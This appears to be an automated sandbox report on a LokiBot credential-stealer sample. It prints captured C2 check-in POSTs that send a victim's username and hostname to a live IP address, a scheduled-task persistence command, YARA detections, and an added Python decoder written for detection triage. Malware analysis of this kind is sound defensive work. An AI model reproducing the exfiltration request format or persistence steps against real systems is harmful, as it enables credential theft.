                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 
6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                    Jun 22, 2021 18:23:11.658443928 CEST | 1234 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                    Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                    Jun 22, 2021 18:23:11.658499002 CEST | 1235 | IN | Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                    Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                    Jun 22, 2021 18:23:11.658548117 CEST | 1236 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                    Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                    Jun 22, 2021 18:23:11.658580065 CEST | 1238 | IN | Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                    Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                    Jun 22, 2021 18:23:11.658617973 CEST | 1239 | IN | Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                    Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                    Jun 22, 2021 18:23:11.658648968 CEST | 1241 | IN | Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                    Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                    Jun 22, 2021 18:23:11.658677101 CEST | 1242 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                    Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />
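The POST in session 0 is the LokiBot check-in that all four ET rules fired on: the fixed "Mozilla/4.08 (Charon; Inferno)" User-Agent, the non-standard Content-Key header, and a binary body that opens with a version word (0x12), a message-type dword (0x27 on both POSTs the exfiltration rules matched) and a run of length-prefixed strings, readable in the ASCII view as the "ckav.ru" marker followed by "jones", "610930" and the hostname "DESKTOP-716T771". The script below is an added example written for this page; it is neither the report's tooling nor LokiBot code. It re-parses exactly the request line, headers and the 82 body bytes the report prints, and stops cleanly where the report truncates the 190-byte body. The framing rules, including reading the 01 00 word in front of each string as "UTF-16LE follows", are inferred from this one capture and should be treated as an assumption rather than a protocol specification.

```python
"""Decode the LokiBot check-in POST of session 0 (port 49735) above.

Added example for this page; not the report's tooling and not LokiBot code.
REQUEST and BODY_PREFIX are transcribed from the report, which prints only
the first 82 of the 190 body bytes. The field framing below is inferred from
this single capture (assumption, not a specification).
"""
import struct
from dataclasses import dataclass, field

LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"

# Transcribed from the report: request line and headers of session 0.
REQUEST = (
    b"POST /32.php/QQojJUjm8ByeT HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: 63.141.228.141\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: C18574AA\r\n"
    b"Content-Length: 190\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

# Body bytes exactly as printed under "Data Raw"; the report cuts off here.
BODY_PREFIX = bytes.fromhex(
    "12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 "
    "00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 "
    "50 00 2d 00 37 00 31 00 36 00 54 00 37"
)

# 0x27 is the only message type visible in this report: it is carried by the
# two POSTs (ports 49735 and 49737) on which ET SIDs 2024312/2024317 fired.
MSG_TYPES = {0x27: "application/credential data"}


def parse_request(raw: bytes):
    """Split a raw HTTP/1.0 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def lokibot_header_indicators(headers: dict) -> list:
    """Header-level traits the ET rules in the report key on."""
    hits = []
    if headers.get("user-agent") == LOKI_USER_AGENT:
        hits.append("user-agent Charon/Inferno")
    if "content-key" in headers:
        hits.append("non-standard Content-Key header")
    if (headers.get("content-type") == "application/octet-stream"
            and headers.get("content-encoding") == "binary"):
        hits.append("binary octet-stream POST body")
    return hits


@dataclass
class Beacon:
    version: int
    msg_type: int
    binary_id: str
    strings: list = field(default_factory=list)
    truncated: bool = False   # set when the body ends inside a field


def parse_beacon(body: bytes) -> Beacon:
    """Walk the beacon body: u16 version, u32 type, u32-length ANSI id,
    then repeated [u16 flag][u32 len][bytes]; flag == 1 means UTF-16LE
    (framing assumed from this capture)."""
    version, msg_type, id_len = struct.unpack_from("<HII", body, 0)
    off = 10
    beacon = Beacon(version, msg_type, body[off:off + id_len].decode("latin-1"))
    off += id_len
    while off < len(body):
        if off + 6 > len(body):          # not even a full field header left
            beacon.truncated = True
            break
        flag, length = struct.unpack_from("<HI", body, off)
        off += 6
        raw = body[off:off + length]
        off += length
        if len(raw) < length:            # capture cut inside this field
            beacon.truncated = True
        if flag == 1:
            raw = raw[:len(raw) - len(raw) % 2]   # drop a dangling half code unit
            beacon.strings.append(raw.decode("utf-16-le"))
        else:
            beacon.strings.append(raw.decode("latin-1"))
    return beacon


def triage(raw_request: bytes) -> dict:
    """Header indicators plus decoded body fields, with truncation made explicit."""
    _method, path, headers, body = parse_request(raw_request)
    beacon = parse_beacon(body)
    return {
        "path": path,
        "indicators": lokibot_header_indicators(headers),
        "version": beacon.version,
        "msg_type": MSG_TYPES.get(beacon.msg_type, "not seen in this report"),
        "binary_id": beacon.binary_id,
        "strings": beacon.strings,
        "truncated": beacon.truncated,
        "declared_length": int(headers["content-length"]),
        "captured_length": len(body),
    }


if __name__ == "__main__":
    for key, value in triage(REQUEST + BODY_PREFIX).items():
        print(f"{key:16} {value}")
```

On the captured prefix the decoder returns "ckav.ru", "jones", "610930" and "DESKTOP-716T" with truncated set, because the 30-byte hostname field is cut after 25 bytes; the ASCII view of the full body shows the name continues as "DESKTOP-716T771". Which of these strings is the username and which the workgroup is not stated by the report, so the code labels them only by position. For detection, the header indicators alone already reproduce the three header-based ET hits; the body parser is what distinguishes the exfiltration POSTs (type 0x27) from the later "Request for C2 Commands" sessions whose bodies the report does not print.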


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.4 | 49737 | 63.141.228.141 | 80 | C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jun 22, 2021 18:23:12.059133053 CEST | 1348 | OUT | POST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 190
                    Connection: close
                    Jun 22, 2021 18:23:12.219800949 CEST1350OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones610930DESKTOP-716T771+08F9C4E9C79A3B52B3F739430HqjDD
                    Jun 22, 2021 18:23:12.893781900 CEST1359INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:12 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8


                    Session ID: 2
                    Source IP: 192.168.2.4
                    Source Port: 49739
                    Destination IP: 63.141.228.141
                    Destination Port: 80
                    Process: C:\Users\user\Desktop\2CW1YLhNIS.exe

                    Timestamp | kBytes transferred | Direction | Data
                    Jun 22, 2021 18:23:13.182091951 CEST | 1374 | OUT | POST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 163
                    Connection: close
                    Jun 22, 2021 18:23:13.342540026 CEST | 1375 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jun 22, 2021 18:23:14.000350952 CEST | 1388 | IN | HTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8


                    Session ID: 3
                    Source IP: 192.168.2.4
                    Source Port: 49741
                    Destination IP: 63.141.228.141
                    Destination Port: 80
                    Process: C:\Users\user\Desktop\2CW1YLhNIS.exe

                    Timestamp | kBytes transferred | Direction | Data
                    Jun 22, 2021 18:23:14.320616007 CEST | 1400 | OUT | POST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 163
                    Connection: close
                    Jun 22, 2021 18:23:14.480549097 CEST | 1401 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jun 22, 2021 18:23:15.133425951 CEST | 1414 | IN | HTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8


                    Code Manipulations

                    Statistics

                    CPU Usage


                    Memory Usage


                    High Level Behavior Distribution


                    Behavior


                    System Behavior

                    General

                    Start time: 18:23:03
                    Start date: 22/06/2021
                    Path: C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Wow64 process (32bit): true
                    Commandline: 'C:\Users\user\Desktop\2CW1YLhNIS.exe'
                    Imagebase: 0x8f0000
                    File size: 1219072 bytes
                    MD5 hash: 76AFCE42F708E6A32DC9D0E52F9F0336
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: .Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation: low

                    General

                    Start time: 18:23:07
                    Start date: 22/06/2021
                    Path: C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit): true
                    Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                    Imagebase: 0xcb0000
                    File size: 185856 bytes
                    MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time:18:23:07
                    Start date:22/06/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff724c50000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:23:08
                    Start date:22/06/2021
                    Path:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Imagebase:0xc90000
                    File size:1219072 bytes
                    MD5 hash:76AFCE42F708E6A32DC9D0E52F9F0336
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis

                      Executed Functions

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: <$<$<$@$B$B$W$d$d$d$d$d$d$d$x$x
                      • API String ID: 0-842138249
                      • Opcode ID: b10c086879e7e12c831fce1576eadda5d31091c9214b2e6e15ce11d527be6001
                      • Instruction ID: b0806de39b7ece7e1d225720d5c9af51c847b9aa48db32d2bd90631eda60cab4
                      • Opcode Fuzzy Hash: b10c086879e7e12c831fce1576eadda5d31091c9214b2e6e15ce11d527be6001
                      • Instruction Fuzzy Hash: 1A23B234A106148FCB54DF28C858BA9B7F2AF89305F2141E9E50AEB361EF75AD85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: <$<$<$@$B$B$W$d$d$d$d$d$d$d$x$x
                      • API String ID: 0-842138249
                      • Opcode ID: aa22505f1ad60133954afa77fce0828c76e94144a0f727a0da980b7ec51311f5
                      • Instruction ID: 0847b533bc7671a53300a448b78d6dbd57c916cdd0ad37963d82bc0473cec7ee
                      • Opcode Fuzzy Hash: aa22505f1ad60133954afa77fce0828c76e94144a0f727a0da980b7ec51311f5
                      • Instruction Fuzzy Hash: 7823C234A106148FCB54DF28C858BA9B7F2AF89305F2141E9E50AEB361EF75AD85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: P>,b
                      • API String ID: 0-1580299262
                      • Opcode ID: 6813d92a6ecb665c130707e8671741ef7d31723c028b0b82d4ddf0961d821401
                      • Instruction ID: 98ada3609e071bd54e5f00d7f9b59babaefdfa5cd97a89d571d431dbed360301
                      • Opcode Fuzzy Hash: 6813d92a6ecb665c130707e8671741ef7d31723c028b0b82d4ddf0961d821401
                      • Instruction Fuzzy Hash: 9FC13A75E052189FDB04CFA4D941BDDFBB2FF89340F20952AE809BB298DB75A901CB15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: P>,b
                      • API String ID: 0-1580299262
                      • Opcode ID: be446c3b43c8a49b5f37d70d79ecaa7b6beea0951842c71ea7b07ef139050356
                      • Instruction ID: 109c441b26b525831b323f162e80a47a94a62bd19ca5f327c263f8c56873b435
                      • Opcode Fuzzy Hash: be446c3b43c8a49b5f37d70d79ecaa7b6beea0951842c71ea7b07ef139050356
                      • Instruction Fuzzy Hash: A7C13A75E052089FDB04CFA4D945B9DFBB6FF89340F20912AE809BB298DB74A9018B15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: `&l
                      • API String ID: 0-486499119
                      • Opcode ID: 139aa651d5954a7952a3167ac479e1a7986d4cf6cfae34c1b3861e8f0ea40927
                      • Instruction ID: 532dd538438825d8d40544b9b94933cb143b9a3492e9e44e176db1b362efac85
                      • Opcode Fuzzy Hash: 139aa651d5954a7952a3167ac479e1a7986d4cf6cfae34c1b3861e8f0ea40927
                      • Instruction Fuzzy Hash: 87815D36F101249FD714DB69DC90BAEB7E3AFC8614F1A81A4E419DBB65DB30AD01CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 3012d3bd8824cc85773644de3d94dda65b8e3ce0c5fc085b07e7752479303083
                      • Instruction ID: fd7a10a5ec4a7f7442a8cee083da92eba6c579a118d48336934038ee51c96bef
                      • Opcode Fuzzy Hash: 3012d3bd8824cc85773644de3d94dda65b8e3ce0c5fc085b07e7752479303083
                      • Instruction Fuzzy Hash: 59512572F101058FCB14CBB8C8C56AEB7B2FBC8255B1581B5E629DB759DB30EC418B81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: Pk
                      • API String ID: 0-1130133409
                      • Opcode ID: 99baf59902eff5ab734a19de080ef87a1f9acb0444643171c6f979a0b773bb77
                      • Instruction ID: b187f13b9ec017c402ced2bb01aa407f1c290ea0edba137a65d62a6d2cfdfc29
                      • Opcode Fuzzy Hash: 99baf59902eff5ab734a19de080ef87a1f9acb0444643171c6f979a0b773bb77
                      • Instruction Fuzzy Hash: A4515AB2E192189BCB08CFA5D9415DDFBF7FBCD240F14A92AD405B7314DB7899018B2A
                      Uniqueness

                      Uniqueness Score: -1.00%

